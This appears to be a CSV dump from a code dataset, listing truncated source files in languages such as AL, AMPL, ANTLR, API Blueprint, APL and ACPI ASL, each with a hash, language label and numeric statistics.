-9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 ","633","0.975346687211094","0.0","0.0" -"12fa944ef83990f456a57ab50ed60c7677d4f7f6","page81.asc",".asc","AGS Script","""courting her"",NY1,50,E,N,"" "","" "","" "",MS,1,1,81 -""going with her"",NY1,50,E,N,"" "","" "","" "",MS,1,1,81 -""sparking her"",NY1,50,E,N,"" "","" "","" "",MS,1,1,81 -""I will be"",NY1,50,E,N,"" "","" "","" "",MS,1,2,81 -""we will be"",NY1,50,E,N,"" "","" "","" "",MS,1,2,81 -""how is it"",NY1,50,E,N,"" "","" "","" "",MS,1,2,81 -""her beau"",NY1,50,O,N,"" "","" "","" "",MS,1,3,81 -fellow,NY1,50,N,N,"" "","" "","" "",MS,1,3,81 -girl,NY1,50,N,N,"" "","" "","" "",MS,1,4,81 -NR,NY1,50,,N,"" "","" "","" "",MS,1,5,81 -""courting her"",NY2A,51.1,E,N,"" "","" "","" "",MS,2,1,81 -""sparking her"",NY2A,51.1,E,N,"" "","" "","" "",MS,2,1,81 -""I will be"",NY2A,51.1,E,N,"" "","" "","" "",MS,2,2,81 -""we will be"",NY2A,51.1,E,N,"" "","" "","" "",MS,2,2,81 -""how is it"",NY2A,51.1,E,N,"" "","" "","" "",MS,2,2,81 -""her beau"",NY2A,51.1,O,N,"" "","" "","" "",MS,2,3,81 -""his girl"",NY2A,51.1,O,N,"" "","" "","" "",MS,2,4,81 -NR,NY2A,51.1,,N,"" "","" "","" "",MS,2,5,81 -""courting her"",NY2B,51.2,E,N,"" "","" "","" "",MS,3,1,81 -""keeping company with her"",NY2B,51.2,E,N,"" "","" "","" "",MS,3,1,81 -""sparking her"",NY2B,51.2,E,N,"" "","" "","" "",MS,3,1,","633","0.975346687211094","0.0","0.0" -"0745c7bcb3b1d105fb6da67d76446730a0f0dd72","n2d_d.ash",".ash","AGS Script","; n2d_d.ash -- NRV2D decompression in 68000 assembly -; -; This file is part of the UCL data compression library. -; -; Copyright (C) 1996-2004 Markus Franz Xaver Johannes Oberhumer -; All Rights Reserved. -; -; The UCL library is free software; you can redistribute it and/or -; modify it under the terms of the GNU General Public License as -; published by the Free Software Foundation; either version 2 of -; the License, or (at your option) any later version. -; -; The UCL library is distributed in the hope that it will be useful, -; but WITHOUT ANY WARRANTY; without even the implied warranty of -; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -; GNU General Public License for more details. -; -; You should have received a copy of the GNU General Public License -; along with the UCL library; see the file COPYING. -; If not, write to the Free Software Foundation, Inc., -; 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. -; -; Markus F.X.J. Oberhumer -; NORMALDATE(PostingDate) THEN - ERROR(Text001); - IF IndexFigure = 100 THEN - ERROR(Text002); - IF IndexFigure <= 0 THEN - ERROR(Text003); - FASetup.GET; - FASetup.TESTFIELD(""Insurance Depr. Book""); - DeprBook.GET(FASetup.""Insurance Depr. Book""); - InsuranceJnlLine.LOCKTABLE; - FAJnlSetup.InsuranceJnlName(DeprBook,InsuranceJnlLine,NextLineNo); - NoSeries := FAJnlSetup.GetIns","221","1.0574162679425838","0.0","0.0" -"06bd073e935d334ab2b94555294572365caf25dd","TestReportLayoutSelection.Codeunit.al",".al","AL","codeunit 134605 ""Test Report Layout Selection"" -{ - Subtype = Test; - EventSubscriberInstance = Manual; - TestPermissions = Disabled; - - trigger OnRun() - begin - // [FEATURE] [Report Layout] - end; - - var - Assert: Codeunit Assert; - LibraryUtility: Codeunit ""Library - Utility""; - LibrarySales: Codeunit ""Library - Sales""; - LibraryPurchase: Codeunit ""Library - Purchase""; - LibrarySmtpMailHandler: Codeunit ""Library - SMTP Mail Handler""; - OneRecordWillBeSentQst: Label 'Only the first of the selected documents can be scheduled in the job queue.\\Do you want to continue?'; - - [Test] - [HandlerFunctions('NotificationHandler')] - [Scope('OnPrem')] - procedure TestNotificationBankInfoWhenPageOpens() - var - CustomReportLayouts: TestPage ""Custom Report Layouts""; - begin - CustomReportLayouts.OpenView(); - CustomReportLayouts.Close(); - end; - - [Test] - [HandlerFunctions('JobQueueEntriesHandler,ReportIs","221","1.0574162679425838","0.0","0.0" -"06b226c82c3eb7780314417384141cb5ad249179","Pag50010.TimeSheetDetail.al",".al","AL","page 50010 ""Time Sheet Detail"" -{ - // version EV - - // EVMC 150811 New Page - // EVST 150922 New Fields: ""Job Description"", ""Job Task Description"" - // EVST 150928 New Field: ""Time Sheet Description"" - // EVST 151005 New Field: ""Work Type Code"" - - Caption = 'Time Sheet Detail'; - Editable = false; - PageType = List; - SourceTable = ""Time Sheet Detail""; - - layout - { - area(content) - { - repeater(Group) - { - field(""Time Sheet No.""; ""Time Sheet No."") - { - ApplicationArea = All; - } - field(""Time Sheet Line No.""; ""Time Sheet Line No."") - { - ApplicationArea = All; - } - field(Date; Date) - { - ApplicationArea = All; - } - field(Type; Type) - { - ApplicationArea = All; - } - field(""Re","221","1.0574162679425838","0.0","0.0" -"06459fd8c3557e1d7c5070b3cf26d8335da9b599","BulkSMSSendMessage.al",".al","AL","page 70063001 BulkSMSSendMesage -{ - PageType = Card; - SourceTable = BulkSMSSetup; - - layout - { - area(content) - { - field(PhoneNo;PhoneNo) - { - CaptionML = ENU='Phone No.'; - } - field(MessageText;MessageText) - { - CaptionML = ENU='Message'; - MultiLine = true; - } - } - } - - actions - { - area(processing) - { - action(Setup) - { - CaptionML = ENU='Setup'; - Image = XMLSetup; - Promoted = true; - PromotedCategory = Process; - PromotedIsBig = true; - PromotedOnly = true; - RunObject = page BulkSMSSetup; - } - action(Send) - { - CaptionML = ENU='Send'; - Image = SendConfirmation; - Promoted = true; - PromotedCategory = Process; - ","221","1.0574162679425838","0.0","0.0" -"08c98d9003ed134f2aa7228fbcac360426e9ee6d","solvcoupe.mod",".mod","AMPL","#Données -param nbpostes; - -set T:=1..nbpostes; -set T2:=0..nbpostes; -param M:=25; - -param d{T}; -param h{T}; -param p{T}; -param f{T}; - -#Variables de décision -var x{T} >=0; -var y{T} >=0; -var s{T2}>=0; - -#Fonction objectif -minimize couts : sum{i in T} (y[i]*f[i] + x[i]*p[i] + h[i]*s[i]); - - -#Contraintes - -s.t. Equilibre{i in T} : (s[i-1]+x[i])=(s[i]+d[i]); -s.t. Activation{i in T}: y[i]*sum{j in i..nbpostes}d[j] >= x[i]; -s.t. contr1 :s[0]=0; -s.t. contr2 :s[nbpostes]=0; -s.t. coupe{t in T} : s[t-1] >= d[t]*(1-y[t]); - -#s.t. contr3 :y[1]=1; -#s.t. contr4 :y[2]=1; -#s.t. contr5 :y[3]=1; -#s.t. contr6 :y[4]=1; -#s.t. contr7 :y[5]=1; - -#Résolution -solve; - -#Affichange des res -display : s; -display : x; -display : y; -display : sum{i in T} (y[i]*f[i] + x[i]*p[i] + h[i]*s[i]); #fonction objectif à recopier - -data; - -param nbpostes:= 5; -param d:= 1 3 2 5 3 6 4 3 5 8; -param p:= 1 2 2 4 3 6 4 8 5 10 ; -param h:= 1 3 2 2 3 3 4 2 5 0; -param f:= 1 10 2 8 3 6 4 4 5 2; - -end; - - - - -","366","1.1296296296296295","0.20218579234972678","0.0" -"06fe08d2ff995fc6323491e7c6900c15345f45d2","ugc_681816257.mod",".mod","AMPL","name=""Extended Traits"" -archive=""C:\\Program Files (x86)\\Steam\\steamapps\\workshop\\content\\281990\\681816257/extended_traits.zip"" -tags={ - ""Balance"" - ""Species"" -} -picture=""preview.jpg"" -remote_file_id=""681816257"" -supported_version=""2.0.*"" -","366","1.1296296296296295","0.20218579234972678","0.0" -"1c398323f1b353826b03e295e33e918f4fc3ff12","bd912.mod",".mod","AMPL","* BD912 -* bjt/pnp/bd912.mod - -.model BD912 PNP(IS=1n BF=3.500E+02 NF=1.009 VAF=1.000E+02 IKF=3.571E-01 ISE=2.107E-08 NE=1.897 BR=4.056 VAR=50 IKR=1.000E+09 ISC=0.000E+00 NC=2.000E+00 RB=1.297 IRB=1 RBM=1.297 RE=2.911E-02 RC=1.674E-01 CJE=1.400E-08 VJE=7.500E-01 MJE=3.300E-01 TF=2.767E-08 XTF=7.974E-01 VTF=9.990E+05 ITF=3.675E+01 -","366","1.1296296296296295","0.20218579234972678","0.0" -"0175986d1cadd33617ffa27662d594d3c0b4d616","alphaconv.mod",".mod","AMPL","NEURON { - POINT_PROCESS AlphaConvol - POINTER Vpre - RANGE e,i,k,g,tau_g,a - NONSPECIFIC_CURRENT i -} - -PARAMETER { - e = 0 (mV) - k = 5e-5 (uS) - tau_a = 1e-6 (ms) -} - -ASSIGNED { - v (mV) - Vpre (mV) - i (nA) - g -} - -STATE { a (microsiemens) } - -INITIAL { - a = 0 -} - -BREAKPOINT { - SOLVE state METHOD cnexp - g = k*(Vpre+65) - i = g^2*(v-e) + a^2*(v+65) -} - -DERIVATIVE state { - a' = tau_a*(Vpre+65) -} -","366","1.1296296296296295","0.20218579234972678","0.0" -"18bf90698d60d245838b6aec329fa46c26e9d37c","c_rbf.mod",".mod","AMPL","svm_type c_svc -kernel_type rbf -gamma 0.111 -nr_class 2 -total_sv 12014 -rho 8.52292 -label 1 0 -nr_sv 6007 6007 -SV -1 1:0.739726 2:0.054795 3:0.027397 5:0.024361517 6:0.01960802 7:0.017039762 -1 1:0.775194 2:0.023256 3:0.031008 5:0.019068776 6:0.0076740077 7:0.018481756 -1 1:0.769585 2:0.011521 3:0.029954 7:0.016620768 -1 1:0.786624 2:0.015924 3:0.022293 5:0.01651186 6:0.0066450066 7:0.017535341 -1 1:0.769231 2:0.014514 3:0.059507 5:0.029042983 7:0.020443201 -1 1:0.681081 2:0.081081 3:0.048649 5:0.014171127 6:0.045627046 7:0.017336848 -1 1:0.779685 2:0.007153 3:0.032904 5:0.019434049 7:0.01673122 -1 1:0.765625 2:0.015625 3:0.054688 7:0.017625762 -1 1:0.755102 2:0.013605 3:0.027211 5:0.037369731 7:0.016550524 -1 1:0.691824 2:0.012579 3:0.113208 5:0.035498636 7:0.016106768 -1 1:0.768627 2:0.017647 3:0.021569 5:0.01669077 7:0.016021043 -1 1:0.777108 2:0.016064 3:0.01004 5:0.011882576 7:0.015366341 -1 1:0.762295 2:0.02459 3:0.045082 5:0.02900571 7:0.019267293 -1 1:0.76259 2:0.014388 3:0.035971 5","366","1.1296296296296295","0.20218579234972678","0.0" -"0c647688004631bc57e8bb32e65ffb58daf11632","vhdl.g4",".g4","ANTLR","// -// Copyright (C) 2010-2014 Denis Gavrish -// -// This program is free software: you can redistribute it and/or modify -// it under the terms of the GNU General Public License as published by -// the Free Software Foundation, either version 3 of the License, or -// (at your option) any later version. -// -// This program is distributed in the hope that it will be useful, -// but WITHOUT ANY WARRANTY; without even the implied warranty of -// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -// GNU General Public License for more details. -// -// You should have received a copy of the GNU General Public License -// along with this program. If not, see . -// - -grammar vhdl; - -ABS: A B S; -ACCESS : A C C E S S; -ACROSS : A C R O S S; -AFTER : A F T E R; -ALIAS : A L I A S; -ALL : A L L; -AND : A N D; -ARCHITECTURE : A R C H I T E C T U R E; -ARRAY : A R R A Y; -ASSERT : A S S E R T; -ATTRIBUTE : A T T R I B U T E; -BEGIN : B E G I N; -BLOCK : B L O C K; -BODY :","149","0.8975903614457831","0.0","0.0" -"0ffbcd491fb81058d3e94faec9669fcb261ed85b","ILPMLgrammar2.g4",".g4","ANTLR","grammar ILPMLgrammar2; - -@header { - package antlr4; -} - -// Redéfinition des programmes -prog returns [com.paracamplus.ilp2.interfaces.IASTprogram node] - : (defs+=globalFunDef ';'?)* (exprs+=expr ';'?) * EOF - ; - -// Fonction globale -globalFunDef returns [com.paracamplus.ilp2.interfaces.IASTfunctionDefinition node] - : 'function' name=IDENT '(' vars+=IDENT? (',' vars+=IDENT)* ')' - body=expr - ; - -// Expressions enrichies -expr returns [com.paracamplus.ilp1.interfaces.IASTexpression node] -// expressions de la grammaire précédente - : '(' exprs+=expr (';'? exprs+=expr)* ';'? ')' # Sequence - | fun=expr '(' args+=expr? (',' args+=expr)* ')' # Invocation - | op=('-' | '!') arg=expr # Unary - | arg1=expr op=('*' | '/' | '%') arg2=expr # Binary - | arg1=expr op=('+' | '-') arg2=expr # Binary - | arg1=expr op=('<' | '<=' | '>' | '>=') arg2=expr # Binary - | arg1=expr op=('==' | '!=') arg2=expr # Binary - | arg1=expr op='&' arg2=expr # Binary - | arg1=expr op=(","149","0.8975903614457831","0.0","0.0" -"15acc19776e6d6435c8b3e32b64832218e0e6137","Java.g4",".g4","ANTLR","/* - [The ""BSD licence""] - Copyright (c) 2013 Terence Parr, Sam Harwell - All rights reserved. - Redistribution and use in source and binary forms, with or without - modification, are permitted provided that the following conditions - are met: - 1. Redistributions of source example must retain the above copyright - notice, this list of conditions and the following disclaimer. - 2. Redistributions in binary form must reproduce the above copyright - notice, this list of conditions and the following disclaimer in the - documentation and/or other materials provided with the distribution. - 3. The name of the author may not be used to endorse or promote products - derived from this software without specific prior written permission. - THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR - IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES - OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. - IN NO EVENT SHALL THE AUTHO","149","0.8975903614457831","0.0","0.0" -"0e20a64fca576904ebeb7eefd75df849a04c34b3","MySQLStatement.g4",".g4","ANTLR","/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the ""License""); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an ""AS IS"" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -grammar MySQLStatement; - -import Symbol, Comments, DMLStatement, DDLStatement, TCLStatement, DCLStatement, DALStatement, RLStatement; - -execute - : ( dalStatement | dclStatement | ddlStatement | dm","149","0.8975903614457831","0.0","0.0" -"05caa7bacea1d82c46203ff3a508ccfdce5bb32e","CobolLexer.g4",".g4","ANTLR","/* - Copyright (C) 2017, Ulrich Wolffgang - All rights reserved. - - Portions copyright (C) 2019 - 2022, Craig Schneiderwent. All rights reserved. - - This software may be modified and distributed under the terms - of the MIT license. See the LICENSE file for details. -*/ - -/* - COBOL Lexer for ANTLR4 - - This is a COBOL Lexer, which started life as part of the COBOL parser at - https://github.com/uwol/proleap-cobol-parser. - - Moved to a separate lexer grammar by Craig Schneiderwent. -*/ - -lexer grammar CobolLexer; - -@lexer::members { - /* - This Boolean is set to true to make the ANTLR testrig work. The - file being parsed is rewritten without columns 73 - 80 if it is - being processed via an application. Under those circumstances, - the lexing code must set this variable to false. - */ - public static Boolean testRig = true; - - /* - The token PICTURE has a different meaning in the CURRENCY SIGN - clause of the Special-Names paragraph than it does in the - Data Division. - */ - pu","149","0.8975903614457831","0.0","0.0" -"0dcdd41dc74c14a5c760509cd6321b02aa85b747","examplecode.apib",".apib","API Blueprint","FORMAT: 1A - -# Example code for using The Grid API - -[Example code directory on Github](https://github.com/the-grid/apidocs/tree/master/code-examples) - -# Dart - - -## Authenticate and get user information - - - - - - - - -# Python - -## Share a file - - - - - - - -# CoffeeScript - -## Share a URL - - - - -## Share a file - - - - - ","47","0.8703703703703703","0.0","0.0" -"08fe66423841d1a6143789f8487c56e8fb14f3e2","ip-protocol.struct.apib",".apib","API Blueprint","## IpProtocol (string) -","47","0.8703703703703703","0.0","0.0" -"034c9527807f0c00cb06692c12b3a82876a72fa5","customer.apib",".apib","API Blueprint","FORMAT: 1A -HOST: http://polls.apiblueprint.org/customer - -# Customer - -Customer is the API as defined for the Customer Microservice that is used for the soaring through the clouds demo sequel. - -## Profile [/profile?email={email}] - -The profile consists of a number of parts: Customer, Address, Phonenumber, Payment details and Preferences - -### findCustomerByUsername [GET] - -+ Request - - + Parameters - + email: 'john.doe@gmail.com' (string) - -+ Response 200 (application/json) - - + Attributes (Customer) - -### Signup [POST] -Sign up as a new customer - -+ Request (application/json) - - + Attributes (Customer) - -+ Response 201 (application/json) - - + Body - - { - ""message"":""your account has been created, please check your email for account verification"" - } - - - - - -## Profile details [/profile/{_id}] - -### Get Profile (GET) -Get the profile details of an existing customer - -+ Request (application/json) - - + Paramete","47","0.8703703703703703","0.0","0.0" -"11b7572c3761902a5cef16406ee5531a4285c5d2","apiary.apib",".apib","API Blueprint","FORMAT: 1A -HOST: loaclhost:8090 - -# Feeds_UI_RESTful_API - -This document defines RESTful API that provide standard interfaces of data transformation between Feeds_UI backend and frontend. - -## Authentication [/auth] - -TBD - -### Sign In [POST] - -TBD - -+ Response 200 - - - -## Feeds List [/feeds] - -The Feeds List resource has the following attributes: - -+ AMOUNT -+ FEEDS -+ FEED_SITE -+ FEED_TYPE - -Collection of all Feeds. List all feeds on Feeds_Status_Page with following attributes: - -+ FEED_ID -+ NAME -+ DESCRIPTION -+ SITE -+ FILENAME -+ TYPE -+ LAST_COMPLT_TIME -+ HISTORY -+ STATUS_FLAG - -### List All Feeds [GET] - -List all feeds in the database, including active and inactive feeds. - -+ Response 200 (application/json) - - { - ""AMOUNT"": 2, - ""FEEDS"": - [ - { - ""FEED_ID"" : 3, - ""NAME"" : ""Shopzilla Daily Home & Garden Unstructured"", - ""DESCRIPTION"" : ""Shopzilla home & garden unstructured feed"", - ","47","0.8703703703703703","0.0","0.0" -"082507e6dc16b055ad06484170ba1c1bf6a485da","apiary.apib",".apib","API Blueprint","FORMAT: 1A -HOST: https://api.lightrail.com/v2/ - -# Lightrail Documentation - -Welcome to Lightrail. Lightrail makes it easy to create gift cards, manage customer account credit, run promotional discount programs, and collect multi-tender payment in a unified checkout solution. Create an account to generate API keys and begin testing. - -[Create an account](https://www.lightrail.com/app/#/auth/register) - -## Authentication -Authentication is done via an authorization header. You can retrieve your Lightrail API key [here](https://www.lightrail.com). - -In requests to Lightrail you must include the following header: -``` -Authorization: Bearer -``` - -## Dates - -All dates are sent and received in 8601 format. - -```text -YYYY-MM-DDTHH:MM:SSZ -``` - -## Filtering - -Resources that may contain lots of entries ([Contacts](#reference/0/contacts/list-contacts), [Values](#reference/0/values/list-values), [Programs](#reference/0/programs/list-programs), [Transactions](#reference/0/transactions)) have filters","47","0.8703703703703703","0.0","0.0" -"06568ecacf50c28f60a175918a6dc5cefc9bd06a","master64.apl",".apl","APL","decl - integer pid,i,s; -enddecl -integer main() -{ - print (""Before Fork""); - - i=0; - while(i<60) do - pid = Fork(); - if(pid == -2) then - s=Exec(""ex10.xsm""); - endif; - if(pid==-1)then - print(""pid=-1""); - breakpoint; - break; - endif; - i=i+1; - endwhile; -// s=Wait(i+1); - breakpoint; - return 0; -} -","12","0.4444444444444444","0.0","0.0" -"1171870c43bbb9d2ab612b450e4dc5da152e20a7","GETCACHEINFO.apl",".apl","APL"," ∇ Z←GETCACHEINFO;D;I;Q;T;D_ [1] ⍝Build full cache directory and return it [2] ⍝Need to get lock and GETCACHECONFIG before calling this [3] ⍝B. Compton, 16 Nov 2017 (from CACHEINFO) [4] [5] [6] [7] D←0 7⍴0 [8] I←0 [9] L1:→(cache[5]2) f else g 28 - -⎕ ← (3>3) f else g 28 - -A ← (2 2 ⍴ ⍳ 4) -⎕ ← (3>2) f else g A - -⎕ ← (3>3) f else g A - -0","12","0.4444444444444444","0.0","0.0" -"015df4ee8638f1018f5e1bd19ccd12619f9f8a4a","create.apl",".apl","APL","decl - integer status; - string file; -enddecl -integer main() -{ - print (""file name: ""); - read(file); - status = Create(file); - print(status); - return 0; -}","12","0.4444444444444444","0.0","0.0" -"1304a3f841a4c51a135b6d06edefe63f4c78a355","hostbridge.asl",".asl","ASL","/* - * This file is part of the coreboot project. - * - * - * This program is free software; you can redistribute it and/or - * modify it under the terms of the GNU General Public License as - * published by the Free Software Foundation; version 2 of - * the License. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - */ - -#include - -Name(_HID,EISAID(""PNP0A08"")) // PCIe -Name(_CID,EISAID(""PNP0A03"")) // PCI - -Name(_BBN, 0) - -Device (MCHC) -{ - Name(_ADR, 0x00000000) // 0:0.0 - - OperationRegion(MCHP, PCI_Config, 0x00, 0x100) - Field (MCHP, DWordAcc, NoLock, Preserve) - { - Offset (0x40), // EPBAR - EPEN, 1, // Enable - , 11, // - EPBR, 20, // EPBAR - - // MCHBAR - MHEN, 1, // Enable - , 13, // - MHBR, 18, // MCHBAR - - // PCIe BAR - PXEN, 1, // Enable - PXSZ, 2, // BAR size - , 23, // - PXBR,","133","0.6785714285714286","0.0","0.0" -"0ebc14e944e79c7563247495c37f3f43ae30de2b","MAIN.asl",".asl","ASL","/* - * Some or all of this work - Copyright (c) 2006 - 2018, Intel Corp. - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without modification, - * are permitted provided that the following conditions are met: - * - * Redistributions of source code must retain the above copyright notice, - * this list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * Neither the name of Intel Corporation nor the names of its contributors - * may be used to endorse or promote products derived from this software - * without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ""AS IS"" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS ","133","0.6785714285714286","0.0","0.0" -"01ea1fe7e1320e0093569d4afb2e6e5b3890e4bb","opregions.asl",".asl","ASL","/* - * Some or all of this work - Copyright (c) 2006 - 2017, Intel Corp. - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without modification, - * are permitted provided that the following conditions are met: - * - * Redistributions of source code must retain the above copyright notice, - * this list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * Neither the name of Intel Corporation nor the names of its contributors - * may be used to endorse or promote products derived from this software - * without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ""AS IS"" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS ","133","0.6785714285714286","0.0","0.0" -"03eda52c15eb3fdd015fe5595bcdec912c9af861","Ether_One_Load_Remover.asl",".asl","ASL"," -state(""UDK"", ""1.00"") -{ - bool addressone: 0x2C8606C; - bool addresstwo: 0x2C87324; - bool addressthree: 0x2C604B4; - bool addressfor: 0x2C603F0; - bool addressfive: ""UDK.exe"",0x2BBD7F0; -} -state(""EtherOne-Win64-Shipping"", ""2.00"") -{ - bool addresssix: 0x2B380C0; - bool addressseven: 0x2DAF85C; -} -startup -{ - settings.Add(""working"", false, ""If you see this its working""); - -} - -isLoading -{ - - if ( game.ProcessName.ToString() == ""EtherOne-Win64-Shipping"" ) - { - if ( current.addresssix == true || current.addressseven == true ) - { - return true; - } - else - { - return false; - } - } - if ( game.ProcessName.ToString() == ""UDK"" ) - { - if ( current.addressone == true || current.addresstwo == true || current.addressthree == true || current.addressfor == true || current.addressfive == true) - { - return true; - } - else - { - return false; - } - } - ","133","0.6785714285714286","0.0","0.0" -"0f167f45561904f9c7de3acc39d896bfe75f8b41","terranCommandCenter.asl",".asl","ASL","// Command center (and commander) in SettlersInSpace.mas2j - -{ include(""rules.asl"") } - -+!delegateTrain(Unit) : building(Unit, Bld) & link(Bld, Ag) <- .print(""Building "", Unit, "" at "", Ag); .send(Ag, achieve, train(Unit)). - -+!workersTrained : not gameStart. -+!workersTrained : unit(""Terran SCV"", C) & C < 5 <- !train(""Terran SCV""). -+!workersTrained : unit(""Terran SCV"", C) & C > 4 <- +workersTrained. - -// +!offensiveUnitTrained. -+!defensiveUnitTrained : U = ""Terran Marine"" & unit(""Terran Marine"", N) & N < 4 <- !delegateTrain(U); !defensiveUnitTrained. -+!defensiveUnitTrained : U = ""Terran Vulture"" & unit(""Terran Vulture"", N) & N < 2 <- !delegateTrain(U); !defensiveUnitTrained. -+!defensiveUnitTrained : unit(""Terran Marine"", M) & M >= 4 & unit(""Terran Vulture"", T) & T >= 2 <- +defensiveUnitTrained. -+!defensiveUnitTrained <- .wait(500); !defensiveUnitTrained. - -+!enemyLocated : not(delegated) & not(friendly(_,""Terran Vulture"",_)) <- +delegated; !!delegateTrain(""Terran Vulture""); !enemyLocated. -+!","133","0.6785714285714286","0.0","0.0" -"093b9a7f21f7b1b7c1766a837642dce33c8ba2f2","ff-wordlist_wiki-wordlist.dsl",".dsl","ASL","#NAME ""ff-wordlist Wiki Wordlist"" -#INDEX_LANGUAGE ""Fula"" -#CONTENTS_LANGUAGE ""Fula"" - -Afirik - [m1]Afirik[/m] - -Norwees - [m1]Norwees[/m] - -Irlannda - [m1]Irlannda[/m] - -Hunngariya - [m1]Hunngariya[/m] - -Hispaanya - [m1]Hispaanya[/m] - -Dowlaaji Dentuɗi - [m1]Dowlaaji Dentuɗi[/m] - -Beljik - [m1]Beljik[/m] - -Luksammbuur - [m1]Luksammbuur[/m] - -Suwed - [m1]Suwed[/m] - -Poloonya - [m1]Poloonya[/m] - -Lituwaniya - [m1]Lituwaniya[/m] - -Italiya - [m1]Italiya[/m] - -Suwis - [m1]Suwis[/m] - -Portokeesi - [m1]Portokeesi[/m] - -Yuroopu - [m1]Yuroopu[/m] - -Aasiya - [m1]Aasiya[/m] - -Wikipeediya - [m1]Wikipeediya[/m] - -Holannda - [m1]Holannda[/m] - -Kenya - [m1]Kenya[/m] - -Gana - [m1]Gana[/m] - -Faransi - [m1]Faransi[/m] - -Esperanto - [m1]Esperanto[/m] - -Faransinkoore - [m1]Faransinkoore[/m] - -Roosiya - [m1]Roosiya[/m] - -Almaanya - [m1]Almaanya[/m] - -Belaruusiya - [m1]Belaruusiya[/m] - -Almankoore - [m1]Almankoore[/m] - -Islannda - [m1]Islannda[/m] - -Estoniya - [m1]Estoniya[/m] - -Go’o - [m1]Go’o[/m] - -Ɗiɗi - [m1]Ɗiɗi[/m] - -Tati - [m1]Tati[/m] - -Nayi - [m1]Nayi[/m] - -Jowi - [m","87","0.44387755102040816","0.0","0.0" -"18c36969af6edaa63ec1576db742d773d7380acf","DSDT.dsl",".dsl","ASL","/* - * Intel ACPI Component Architecture - * AML/ASL+ Disassembler version 20150930-64 - * Copyright (c) 2000 - 2015 Intel Corporation - * - * Disassembling to non-symbolic legacy ASL operators - * - * Disassembly of DSDT.aml, Fri Oct 23 18:40:38 2015 - * - * Original Table Header: - * Signature ""DSDT"" - * Length 0x0001A05F (106591) - * Revision 0x02 - * Checksum 0x23 - * OEM ID ""_ASUS_"" - * OEM Table ID ""Notebook"" - * OEM Revision 0x01072009 (17244169) - * Compiler ID ""INTL"" - * Compiler Version 0x20120913 (538052883) - */ -DefinitionBlock (""DSDT.aml"", ""DSDT"", 2, ""_ASUS_"", ""Notebook"", 0x01072009) -{ - /* - * iASL Warning: There were 32 external control methods found during - * disassembly, but only 24 were resolved (8 unresolved). Additional - * ACPI tables may be required to properly disassemble the code. This - * resulting disassembler output file may not compile because the - * disassembler did","87","0.44387755102040816","0.0","0.0" -"0b57cb202e06cea6fd61a9ff48f7631ca173b118","SSDT-7-SaSsdt.dsl",".dsl","ASL","/* - * Intel ACPI Component Architecture - * AML/ASL+ Disassembler version 20160422-64(RM) - * Copyright (c) 2000 - 2016 Intel Corporation - * - * Disassembling to non-symbolic legacy ASL operators - * - * Disassembly of SSDT-7-SaSsdt.aml, Sun Jan 20 19:49:27 2019 - * - * Original Table Header: - * Signature ""SSDT"" - * Length 0x00006B80 (27520) - * Revision 0x02 - * Checksum 0xA5 - * OEM ID ""SaSsdt"" - * OEM Table ID ""SaSsdt "" - * OEM Revision 0x00003000 (12288) - * Compiler ID ""INTL"" - * Compiler Version 0x20120913 (538052883) - */ -DefinitionBlock ("""", ""SSDT"", 2, ""SaSsdt"", ""SaSsdt "", 0x00003000) -{ - /* - * iASL Warning: There were 10 external control methods found during - * disassembly, but only 7 were resolved (3 unresolved). Additional - * ACPI tables may be required to properly disassemble the code. This - * resulting disassembler output file may not compile because the - * disassembler did n","87","0.44387755102040816","0.0","0.0" -"0c85a1f05e35afc1c8bc86475c4de69d964daff0","gen_trial_jobs_NEW.dsl",".dsl","ASL","import groovy.json.JsonSlurper - -//********************************************************************** -// Define constants -//********************************************************************** -def DAYS2KEEP = 30 -def NUM2KEEP = 100 -def TIMEOUT = 90 - -def NUM_DAYS = 11 - -//********************************************************************** -// Define parameters with default settings -//********************************************************************** -def ci_job_name_root = 'run-single-trial' -def fish = ""Harlene"" -def thatpistimulus = ""0"" -def pistimulus = ""0.png"" -def correctside = ""B"" -def day = ""1"" -def session = ""1"" -def feedside = ""both"" -def sex = ""female"" 